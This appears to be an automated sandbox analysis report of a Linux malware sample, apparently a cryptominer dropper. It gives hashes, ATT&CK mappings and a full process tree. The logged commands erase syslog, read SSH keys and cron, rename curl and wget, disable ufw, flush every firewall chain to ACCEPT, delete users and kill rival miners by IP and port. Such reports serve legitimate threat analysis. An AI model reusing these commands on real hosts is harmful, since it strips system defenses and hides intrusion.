4604144b3cb13182a3645ca521e2e976a92292938ea1dd97a97bae7d4aa2b612

General

Target

4604144b3cb13182a3645ca521e2e976a92292938ea1dd97a97bae7d4aa2b612
Size

35KB
MD5

92fc64f05b1b0597acc58b7cc839a33b
SHA1

f9b3668004fb6810a3a6a44e31fb027782233dfc
SHA256

4604144b3cb13182a3645ca521e2e976a92292938ea1dd97a97bae7d4aa2b612
SHA512

58431bb60c834224b567727db06c1f6adf0845b76aec00aa18200a0e5a1758e2422695c2ad7268db22e77ea57748adb05affb90bec56bd397d62416c4f885094
SSDEEP

384:EQQwQHDf6lpTWg3vM4Qdre21jT58vKpG2Y0orcfKLUv0KZnNEVdUeUoJpJydIDbS:oFNB48Fkc2zq0xvcGGIZ3L8eW

Score

9^/10

persistence

Malware Config

Signatures

Deletes system logs 1 TTPs 1 IoCs

Indicator Removal on Host
T1070

Processes:

rm

description ioc process

/var/log/syslog /var/log/syslog rm
Adds new SSH keys 1 IoCs
Linux special file to hold SSH keys. The threat actor may add new keys for further remote access.
persistence

Processes:

cat

description ioc process

/root/.ssh/authorized_keys /root/.ssh/authorized_keys cat
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
persistence

Scheduled Task
T1053

Processes:

cat

description ioc process

/var/spool/cron/ /var/spool/cron/ cat
Write file to user bin folder 1 TTPs 2 IoCs

Hijack Execution Flow
T1574

Processes:

ufw

description ioc process

/usr/bin/pyvenv.cfg /usr/bin/pyvenv.cfg ufw
/usr/sbin/ufw /usr/sbin/ufw ufw

description	ioc	process
/var/log/syslog	/var/log/syslog	rm

description	ioc	process
/root/.ssh/authorized_keys	/root/.ssh/authorized_keys	cat

description	ioc	process
/var/spool/cron/	/var/spool/cron/	cat

description	ioc	process
/usr/bin/pyvenv.cfg	/usr/bin/pyvenv.cfg	ufw
/usr/sbin/ufw	/usr/sbin/ufw	ufw

Reads CPU attributes 1 TTPs 11 IoCs

System Information Discovery

T1082

Processes:

killpspspspspspspspspsps

description	ioc	process
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	kill
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps
/sys/devices/system/cpu/online	/sys/devices/system/cpu/online	ps

Enumerates kernel/hardware configuration 1 TTPs 2 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

Processes:

modprobe

description	ioc	process
/sys/module/ip6_tables/initstate	/sys/module/ip6_tables/initstate	modprobe
/sys/module/x_tables/initstate	/sys/module/x_tables/initstate	modprobe

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

Processes:

pspspspspspspsps4604144b3cb13182a3645ca521e2e976a92292938ea1dd97a97bae7d4aa2b612pspsmv

description	ioc	process
/proc/29/status	/proc/29/status	ps
/proc/83/cmdline	/proc/83/cmdline	ps
/proc/19/stat	/proc/19/stat	ps
/proc/569/status	/proc/569/status	ps
/proc/16/status	/proc/16/status	ps
/proc/158/stat	/proc/158/stat	ps
/proc/11/status	/proc/11/status	ps
/proc/541/status	/proc/541/status	ps
/proc/14/cmdline	/proc/14/cmdline	ps
/proc/35/status	/proc/35/status	ps
/proc/159/cmdline	/proc/159/cmdline	ps
/proc/899/stat	/proc/899/stat	ps
/proc/127/cmdline	/proc/127/cmdline	ps
/proc/252/cmdline	/proc/252/cmdline	ps
/proc/32/cmdline	/proc/32/cmdline	ps
/proc/569/stat	/proc/569/stat	ps
/proc/158/cmdline	/proc/158/cmdline	ps
/proc/82/stat	/proc/82/stat	ps
/proc/169/status	/proc/169/status	ps
/proc/167/stat	/proc/167/stat	ps
/proc/28/stat	/proc/28/stat	ps
/proc/370/cmdline	/proc/370/cmdline	ps
/proc/571/status	/proc/571/status	ps
/proc/157/stat	/proc/157/stat	ps
/proc/23/stat	/proc/23/stat	ps
/proc/sys/vm/nr_hugepages	/proc/sys/vm/nr_hugepages	4604144b3cb13182a3645ca521e2e976a92292938ea1dd97a97bae7d4aa2b612
/proc/stat	/proc/stat	ps
/proc/3/cmdline	/proc/3/cmdline	ps
/proc/27/stat	/proc/27/stat	ps
/proc/882/cmdline	/proc/882/cmdline	ps
/proc/310/stat	/proc/310/stat	ps
/proc/393/stat	/proc/393/stat	ps
/proc/meminfo	/proc/meminfo	ps
/proc/32/stat	/proc/32/stat	ps
/proc/168/cmdline	/proc/168/cmdline	ps
/proc/193/cmdline	/proc/193/cmdline	ps
/proc/20/status	/proc/20/status	ps
/proc/19/cmdline	/proc/19/cmdline	ps
/proc/29/stat	/proc/29/stat	ps
/proc/85/cmdline	/proc/85/cmdline	ps
/proc/23/stat	/proc/23/stat	ps
/proc/26/status	/proc/26/status	ps
/proc/14/status	/proc/14/status	ps
/proc/23/stat	/proc/23/stat	ps
/proc/85/cmdline	/proc/85/cmdline	ps
/proc/8/stat	/proc/8/stat	ps
/proc/394/cmdline	/proc/394/cmdline	ps
/proc/156/cmdline	/proc/156/cmdline	ps
/proc/2/cmdline	/proc/2/cmdline	ps
/proc/15/cmdline	/proc/15/cmdline	ps
/proc/156/cmdline	/proc/156/cmdline	ps
/proc/10/status	/proc/10/status	ps
/proc/36/status	/proc/36/status	ps
/proc/82/stat	/proc/82/stat	ps
/proc/sys/kernel/osrelease	/proc/sys/kernel/osrelease	ps
/proc/10/stat	/proc/10/stat	ps
/proc/6/cmdline	/proc/6/cmdline	ps
/proc/892/status	/proc/892/status	ps
/proc/filesystems	/proc/filesystems	mv
/proc/167/cmdline	/proc/167/cmdline	ps
/proc/25/stat	/proc/25/stat	ps
/proc/meminfo	/proc/meminfo	ps
/proc/391/cmdline	/proc/391/cmdline	ps
/proc/16/cmdline	/proc/16/cmdline	ps

Writes file to tmp directory 6 IoCs

Malware often drops required files in the /tmp directory.

Processes:

chattrrmrmrmrm4604144b3cb13182a3645ca521e2e976a92292938ea1dd97a97bae7d4aa2b612

description	ioc	process
/tmp/	/tmp/	chattr
/tmp/addres*	/tmp/addres*	rm
/tmp/walle*	/tmp/walle*	rm
/tmp/keys	/tmp/keys	rm
/tmp/.null	/tmp/.null	rm
/tmp/4604144b3cb13182a3645ca521e2e976a92292938ea1dd97a97bae7d4aa2b612	/tmp/4604144b3cb13182a3645ca521e2e976a92292938ea1dd97a97bae7d4aa2b612	4604144b3cb13182a3645ca521e2e976a92292938ea1dd97a97bae7d4aa2b612

/tmp/4604144b3cb13182a3645ca521e2e976a92292938ea1dd97a97bae7d4aa2b612
/tmp/4604144b3cb13182a3645ca521e2e976a92292938ea1dd97a97bae7d4aa2b612
1⤵
- Reads runtime system information
- Writes file to tmp directory
PID:571

/bin/sync
sync
2⤵
PID:572

/bin/cat
cat /var/spool/cron/
2⤵
- Creates/modifies Cron job
PID:578

/bin/cat
cat /root/.ssh/authorized_keys
2⤵
- Adds new SSH keys
PID:579

/bin/mv
mv /usr/bin/curl /usr/bin/url
2⤵
PID:580

/bin/mv
mv /usr/bin/url /usr/bin/cd1
2⤵
PID:581

/bin/mv
mv /usr/bin/wget /usr/bin/get
2⤵
- Reads runtime system information
PID:582

/bin/mv
mv /usr/bin/get /usr/bin/wd1
2⤵
PID:583

/bin/rm
rm -rf /var/log/syslog
2⤵
- Deletes system logs
PID:584

/usr/bin/chattr
chattr -iua /tmp/
2⤵
- Writes file to tmp directory
PID:585

/usr/bin/chattr
chattr -iua /var/tmp/
2⤵
PID:586

/usr/sbin/ufw
ufw disable
2⤵
- Write file to user bin folder
PID:587

/sbin/iptables
/sbin/iptables -V
3⤵
PID:588

/lib/ufw/ufw-init
/lib/ufw/ufw-init force-stop
3⤵
PID:589

/sbin/ip6tables
ip6tables -L INPUT -n
4⤵
PID:590

/sbin/iptables
iptables -F ufw-logging-deny
4⤵
PID:595

/sbin/iptables
iptables -F ufw-logging-allow
4⤵
PID:598

/sbin/iptables
iptables -F ufw-not-local
4⤵
PID:599

/sbin/iptables
iptables -F ufw-user-logging-input
4⤵
PID:600

/sbin/iptables
iptables -F ufw-user-limit-accept
4⤵
PID:601

/sbin/iptables
iptables -F ufw-user-limit
4⤵
PID:602

/sbin/iptables
iptables -F ufw-skip-to-policy-input
4⤵
PID:603

/sbin/iptables
iptables -F ufw-reject-input
4⤵
PID:604

/sbin/iptables
iptables -F ufw-after-logging-input
4⤵
PID:605

/sbin/iptables
iptables -F ufw-after-input
4⤵
PID:606

/sbin/iptables
iptables -F ufw-user-input
4⤵
PID:607

/sbin/iptables
iptables -F ufw-before-input
4⤵
PID:608

/sbin/iptables
iptables -F ufw-before-logging-input
4⤵
PID:609

/sbin/iptables
iptables -F ufw-skip-to-policy-forward
4⤵
PID:610

/sbin/iptables
iptables -F ufw-reject-forward
4⤵
PID:611

/sbin/iptables
iptables -F ufw-after-logging-forward
4⤵
PID:612

/sbin/iptables
iptables -F ufw-after-forward
4⤵
PID:613

/sbin/iptables
iptables -F ufw-user-logging-forward
4⤵
PID:614

/sbin/iptables
iptables -F ufw-user-forward
4⤵
PID:615

/sbin/iptables
iptables -F ufw-before-forward
4⤵
PID:616

/sbin/iptables
iptables -F ufw-before-logging-forward
4⤵
PID:617

/sbin/iptables
iptables -F ufw-track-forward
4⤵
PID:618

/sbin/iptables
iptables -F ufw-track-output
4⤵
PID:619

/sbin/iptables
iptables -F ufw-track-input
4⤵
PID:620

/sbin/iptables
iptables -F ufw-skip-to-policy-output
4⤵
PID:621

/sbin/iptables
iptables -F ufw-reject-output
4⤵
PID:622

/sbin/iptables
iptables -F ufw-after-logging-output
4⤵
PID:623

/sbin/iptables
iptables -F ufw-after-output
4⤵
PID:624

/sbin/iptables
iptables -F ufw-user-logging-output
4⤵
PID:625

/sbin/iptables
iptables -F ufw-user-output
4⤵
PID:626

/sbin/iptables
iptables -F ufw-before-output
4⤵
PID:627

/sbin/iptables
iptables -F ufw-before-logging-output
4⤵
PID:628

/sbin/iptables
iptables -Z ufw-logging-deny
4⤵
PID:629

/sbin/iptables
iptables -Z ufw-logging-allow
4⤵
PID:630

/sbin/iptables
iptables -Z ufw-not-local
4⤵
PID:631

/sbin/iptables
iptables -Z ufw-user-logging-input
4⤵
PID:632

/sbin/iptables
iptables -Z ufw-user-limit-accept
4⤵
PID:633

/sbin/iptables
iptables -Z ufw-user-limit
4⤵
PID:634

/sbin/iptables
iptables -Z ufw-skip-to-policy-input
4⤵
PID:635

/sbin/iptables
iptables -Z ufw-reject-input
4⤵
PID:636

/sbin/iptables
iptables -Z ufw-after-logging-input
4⤵
PID:637

/sbin/iptables
iptables -Z ufw-after-input
4⤵
PID:638

/sbin/iptables
iptables -Z ufw-user-input
4⤵
PID:639

/sbin/iptables
iptables -Z ufw-before-input
4⤵
PID:640

/sbin/iptables
iptables -Z ufw-before-logging-input
4⤵
PID:641

/sbin/iptables
iptables -Z ufw-skip-to-policy-forward
4⤵
PID:642

/sbin/iptables
iptables -Z ufw-reject-forward
4⤵
PID:643

/sbin/iptables
iptables -Z ufw-after-logging-forward
4⤵
PID:644

/sbin/iptables
iptables -Z ufw-after-forward
4⤵
PID:645

/sbin/iptables
iptables -Z ufw-user-logging-forward
4⤵
PID:646

/sbin/iptables
iptables -Z ufw-user-forward
4⤵
PID:647

/sbin/iptables
iptables -Z ufw-before-forward
4⤵
PID:648

/sbin/iptables
iptables -Z ufw-before-logging-forward
4⤵
PID:649

/sbin/iptables
iptables -Z ufw-track-forward
4⤵
PID:650

/sbin/iptables
iptables -Z ufw-track-output
4⤵
PID:651

/sbin/iptables
iptables -Z ufw-track-input
4⤵
PID:652

/sbin/iptables
iptables -Z ufw-skip-to-policy-output
4⤵
PID:653

/sbin/iptables
iptables -Z ufw-reject-output
4⤵
PID:654

/sbin/iptables
iptables -Z ufw-after-logging-output
4⤵
PID:655

/sbin/iptables
iptables -Z ufw-after-output
4⤵
PID:656

/sbin/iptables
iptables -Z ufw-user-logging-output
4⤵
PID:657

/sbin/iptables
iptables -Z ufw-user-output
4⤵
PID:658

/sbin/iptables
iptables -Z ufw-before-output
4⤵
PID:659

/sbin/iptables
iptables -Z ufw-before-logging-output
4⤵
PID:660

/sbin/iptables
iptables -X ufw-logging-deny
4⤵
PID:661

/sbin/iptables
iptables -X ufw-logging-allow
4⤵
PID:662

/sbin/iptables
iptables -X ufw-not-local
4⤵
PID:663

/sbin/iptables
iptables -X ufw-user-logging-input
4⤵
PID:664

/sbin/iptables
iptables -X ufw-user-logging-output
4⤵
PID:665

/sbin/iptables
iptables -X ufw-user-logging-forward
4⤵
PID:666

/sbin/iptables
iptables -X ufw-user-limit-accept
4⤵
PID:667

/sbin/iptables
iptables -X ufw-user-limit
4⤵
PID:668

/sbin/iptables
iptables -X ufw-user-input
4⤵
PID:669

/sbin/iptables
iptables -X ufw-user-forward
4⤵
PID:670

/sbin/iptables
iptables -X ufw-user-output
4⤵
PID:671

/sbin/iptables
iptables -X ufw-skip-to-policy-input
4⤵
PID:672

/sbin/iptables
iptables -X ufw-skip-to-policy-output
4⤵
PID:673

/sbin/iptables
iptables -X ufw-skip-to-policy-forward
4⤵
PID:674

/sbin/iptables
iptables -P INPUT ACCEPT
4⤵
PID:675

/sbin/iptables
iptables -P OUTPUT ACCEPT
4⤵
PID:676

/sbin/iptables
iptables -P FORWARD ACCEPT
4⤵
PID:677

/sbin/ip6tables
ip6tables -F ufw6-logging-deny
4⤵
PID:678

/sbin/ip6tables
ip6tables -F ufw6-logging-allow
4⤵
PID:679

/sbin/ip6tables
ip6tables -F ufw6-not-local
4⤵
PID:680

/sbin/ip6tables
ip6tables -F ufw6-user-logging-input
4⤵
PID:681

/sbin/ip6tables
ip6tables -F ufw6-user-limit-accept
4⤵
PID:682

/sbin/ip6tables
ip6tables -F ufw6-user-limit
4⤵
PID:683

/sbin/ip6tables
ip6tables -F ufw6-skip-to-policy-input
4⤵
PID:684

/sbin/ip6tables
ip6tables -F ufw6-reject-input
4⤵
PID:685

/sbin/ip6tables
ip6tables -F ufw6-after-logging-input
4⤵
PID:686

/sbin/ip6tables
ip6tables -F ufw6-after-input
4⤵
PID:687

/sbin/ip6tables
ip6tables -F ufw6-user-input
4⤵
PID:688

/sbin/ip6tables
ip6tables -F ufw6-before-input
4⤵
PID:689

/sbin/ip6tables
ip6tables -F ufw6-before-logging-input
4⤵
PID:690

/sbin/ip6tables
ip6tables -F ufw6-skip-to-policy-forward
4⤵
PID:691

/sbin/ip6tables
ip6tables -F ufw6-reject-forward
4⤵
PID:692

/sbin/ip6tables
ip6tables -F ufw6-after-logging-forward
4⤵
PID:693

/sbin/ip6tables
ip6tables -F ufw6-after-forward
4⤵
PID:694

/sbin/ip6tables
ip6tables -F ufw6-user-logging-forward
4⤵
PID:695

/sbin/ip6tables
ip6tables -F ufw6-user-forward
4⤵
PID:696

/sbin/ip6tables
ip6tables -F ufw6-before-forward
4⤵
PID:697

/sbin/ip6tables
ip6tables -F ufw6-before-logging-forward
4⤵
PID:698

/sbin/ip6tables
ip6tables -F ufw6-track-forward
4⤵
PID:699

/sbin/ip6tables
ip6tables -F ufw6-track-output
4⤵
PID:700

/sbin/ip6tables
ip6tables -F ufw6-track-input
4⤵
PID:701

/sbin/ip6tables
ip6tables -F ufw6-skip-to-policy-output
4⤵
PID:702

/sbin/ip6tables
ip6tables -F ufw6-reject-output
4⤵
PID:703

/sbin/ip6tables
ip6tables -F ufw6-after-logging-output
4⤵
PID:704

/sbin/ip6tables
ip6tables -F ufw6-after-output
4⤵
PID:705

/sbin/ip6tables
ip6tables -F ufw6-user-logging-output
4⤵
PID:706

/sbin/ip6tables
ip6tables -F ufw6-user-output
4⤵
PID:707

/sbin/ip6tables
ip6tables -F ufw6-before-output
4⤵
PID:708

/sbin/ip6tables
ip6tables -F ufw6-before-logging-output
4⤵
PID:709

/sbin/ip6tables
ip6tables -Z ufw6-logging-deny
4⤵
PID:710

/sbin/ip6tables
ip6tables -Z ufw6-logging-allow
4⤵
PID:711

/sbin/ip6tables
ip6tables -Z ufw6-not-local
4⤵
PID:712

/sbin/ip6tables
ip6tables -Z ufw6-user-logging-input
4⤵
PID:713

/sbin/ip6tables
ip6tables -Z ufw6-user-limit-accept
4⤵
PID:714

/sbin/ip6tables
ip6tables -Z ufw6-user-limit
4⤵
PID:715

/sbin/ip6tables
ip6tables -Z ufw6-skip-to-policy-input
4⤵
PID:716

/sbin/ip6tables
ip6tables -Z ufw6-reject-input
4⤵
PID:717

/sbin/ip6tables
ip6tables -Z ufw6-after-logging-input
4⤵
PID:718

/sbin/ip6tables
ip6tables -Z ufw6-after-input
4⤵
PID:719

/sbin/ip6tables
ip6tables -Z ufw6-user-input
4⤵
PID:720

/sbin/ip6tables
ip6tables -Z ufw6-before-input
4⤵
PID:721

/sbin/ip6tables
ip6tables -Z ufw6-before-logging-input
4⤵
PID:722

/sbin/ip6tables
ip6tables -Z ufw6-skip-to-policy-forward
4⤵
PID:723

/sbin/ip6tables
ip6tables -Z ufw6-reject-forward
4⤵
PID:724

/sbin/ip6tables
ip6tables -Z ufw6-after-logging-forward
4⤵
PID:725

/sbin/ip6tables
ip6tables -Z ufw6-after-forward
4⤵
PID:726

/sbin/ip6tables
ip6tables -Z ufw6-user-logging-forward
4⤵
PID:727

/sbin/ip6tables
ip6tables -Z ufw6-user-forward
4⤵
PID:728

/sbin/ip6tables
ip6tables -Z ufw6-before-forward
4⤵
PID:729

/sbin/ip6tables
ip6tables -Z ufw6-before-logging-forward
4⤵
PID:730

/sbin/ip6tables
ip6tables -Z ufw6-track-forward
4⤵
PID:731

/sbin/ip6tables
ip6tables -Z ufw6-track-output
4⤵
PID:732

/sbin/ip6tables
ip6tables -Z ufw6-track-input
4⤵
PID:733

/sbin/ip6tables
ip6tables -Z ufw6-skip-to-policy-output
4⤵
PID:734

/sbin/ip6tables
ip6tables -Z ufw6-reject-output
4⤵
PID:735

/sbin/ip6tables
ip6tables -Z ufw6-after-logging-output
4⤵
PID:736

/sbin/ip6tables
ip6tables -Z ufw6-after-output
4⤵
PID:737

/sbin/ip6tables
ip6tables -Z ufw6-user-logging-output
4⤵
PID:738

/sbin/ip6tables
ip6tables -Z ufw6-user-output
4⤵
PID:739

/sbin/ip6tables
ip6tables -Z ufw6-before-output
4⤵
PID:740

/sbin/ip6tables
ip6tables -Z ufw6-before-logging-output
4⤵
PID:741

/sbin/ip6tables
ip6tables -X ufw6-logging-deny
4⤵
PID:742

/sbin/ip6tables
ip6tables -X ufw6-logging-allow
4⤵
PID:743

/sbin/ip6tables
ip6tables -X ufw6-not-local
4⤵
PID:744

/sbin/ip6tables
ip6tables -X ufw6-user-logging-input
4⤵
PID:745

/sbin/ip6tables
ip6tables -X ufw6-user-logging-output
4⤵
PID:746

/sbin/ip6tables
ip6tables -X ufw6-user-logging-forward
4⤵
PID:747

/sbin/ip6tables
ip6tables -X ufw6-user-limit-accept
4⤵
PID:748

/sbin/ip6tables
ip6tables -X ufw6-user-limit
4⤵
PID:749

/sbin/ip6tables
ip6tables -X ufw6-user-input
4⤵
PID:750

/sbin/ip6tables
ip6tables -X ufw6-user-forward
4⤵
PID:751

/sbin/ip6tables
ip6tables -X ufw6-user-output
4⤵
PID:752

/sbin/ip6tables
ip6tables -X ufw6-skip-to-policy-input
4⤵
PID:753

/sbin/ip6tables
ip6tables -X ufw6-skip-to-policy-output
4⤵
PID:754

/sbin/ip6tables
ip6tables -X ufw6-skip-to-policy-forward
4⤵
PID:755

/sbin/ip6tables
ip6tables -P INPUT ACCEPT
4⤵
PID:756

/sbin/ip6tables
ip6tables -P OUTPUT ACCEPT
4⤵
PID:757

/sbin/ip6tables
ip6tables -P FORWARD ACCEPT
4⤵
PID:758

/sbin/iptables
iptables -F
2⤵
PID:759

/usr/sbin/userdel
userdel akay
2⤵
PID:760

/usr/sbin/userdel
userdel vfinder
2⤵
PID:761

/bin/rm
rm -rf "/tmp/addres*"
2⤵
- Writes file to tmp directory
PID:762

/bin/rm
rm -rf "/tmp/walle*"
2⤵
- Writes file to tmp directory
PID:763

/bin/rm
rm -rf /tmp/keys
2⤵
- Writes file to tmp directory
PID:764

/bin/rm
rm -f /tmp/.null
2⤵
- Writes file to tmp directory
PID:765

/sbin/sysctl
sysctl -w "vm.nr_hugepages=128"
2⤵
PID:766

/bin/grep
grep 185.71.65.238
2⤵
PID:768

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:769

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:770

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:771

/bin/grep
grep 140.82.52.87
2⤵
PID:773

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:774

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:775

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:776

/bin/grep
grep :443
2⤵
PID:778

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:779

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:780

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:782

/bin/grep
grep -v -
2⤵
PID:781

/bin/grep
grep :23
2⤵
PID:784

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:785

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:786

/bin/grep
grep -v -
2⤵
PID:787

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:788

/bin/grep
grep :443
2⤵
PID:790

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:791

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:792

/bin/grep
grep -v -
2⤵
PID:793

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:794

/bin/grep
grep :143
2⤵
PID:796

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:797

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:798

/bin/grep
grep -v -
2⤵
PID:799

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:800

/bin/grep
grep :2222
2⤵
PID:802

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:803

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:804

/bin/grep
grep -v -
2⤵
PID:805

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:806

/bin/grep
grep :3333
2⤵
PID:808

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:809

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:810

/bin/grep
grep -v -
2⤵
PID:811

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:812

/bin/grep
grep :3389
2⤵
PID:814

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:815

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:816

/bin/grep
grep -v -
2⤵
PID:817

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:818

/bin/grep
grep :5555
2⤵
PID:820

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:822

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:821

/bin/grep
grep -v -
2⤵
PID:823

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:824

/bin/grep
grep :6666
2⤵
PID:826

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:827

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:828

/bin/grep
grep -v -
2⤵
PID:829

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:830

/bin/grep
grep :6665
2⤵
PID:832

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:833

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:834

/bin/grep
grep -v -
2⤵
PID:835

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:836

/bin/grep
grep :6667
2⤵
PID:838

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:840

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:839

/bin/grep
grep -v -
2⤵
PID:841

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:842

/bin/grep
grep :7777
2⤵
PID:844

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:845

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:846

/bin/grep
grep -v -
2⤵
PID:847

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:848

/bin/grep
grep :8444
2⤵
PID:850

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:852

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:851

/bin/grep
grep -v -
2⤵
PID:853

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:854

/bin/grep
grep :3347
2⤵
PID:856

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:857

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:858

/bin/grep
grep -v -
2⤵
PID:859

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:860

/bin/grep
grep -v grep
2⤵
PID:862

/bin/grep
grep :3333
2⤵
PID:863

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:861

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:864

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:865

/bin/grep
grep -v grep
2⤵
PID:867

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:866

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:869

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:870

/bin/grep
grep :5555
2⤵
PID:868

/bin/grep
grep -v grep
2⤵
PID:872

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:871

/bin/grep
grep "kworker -c\\"
2⤵
PID:873

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:874

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:875

/bin/grep
grep -v grep
2⤵
PID:877

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:876

/bin/grep
grep log_
2⤵
PID:878

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:879

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:880

/bin/grep
grep -v grep
2⤵
PID:882

/bin/grep
grep systemten
2⤵
PID:883

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:881

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:884

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:885

/bin/grep
grep -v grep
2⤵
PID:887

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:886

/bin/grep
grep netns
2⤵
PID:888

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:889

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:890

/usr/local/sbin/kill
kill -9 14
3⤵
PID:891

/usr/local/bin/kill
kill -9 14
3⤵
PID:891

/usr/sbin/kill
kill -9 14
3⤵
PID:891

/usr/bin/kill
kill -9 14
3⤵
PID:891

/sbin/kill
kill -9 14
3⤵
PID:891

/bin/kill
kill -9 14
3⤵
- Reads CPU attributes
PID:891

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:892

/bin/grep
grep voltuned
2⤵
PID:894

/bin/grep
grep -v grep
2⤵
PID:893

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:895

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:896

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:897

/bin/grep
grep -v grep
2⤵
PID:898

/bin/grep
grep darwin
2⤵
PID:899

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:900

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:901

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:902

/bin/grep
grep -v grep
2⤵
PID:903

/bin/grep
grep /tmp/dl
2⤵
PID:904

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:905

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:906

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:907

/bin/grep
grep -v grep
2⤵
PID:908

/bin/grep
grep /tmp/ddg
2⤵
PID:909

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:911

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:910

/bin/grep
grep -v grep
2⤵
PID:913

/bin/ps
ps aux
2⤵
PID:912

/bin/grep
grep /tmp/pprt
2⤵
PID:914

/sbin/modprobe
/sbin/modprobe ip6_tables
1⤵
- Enumerates kernel/hardware configuration
PID:591

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

Hijack Execution Flow

Scheduled Task

Privilege Escalation

Hijack Execution Flow

Scheduled Task

Defense Evasion

Hijack Execution Flow

1

T1574

Indicator Removal on Host

1

T1070

Credential Access

Discovery

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

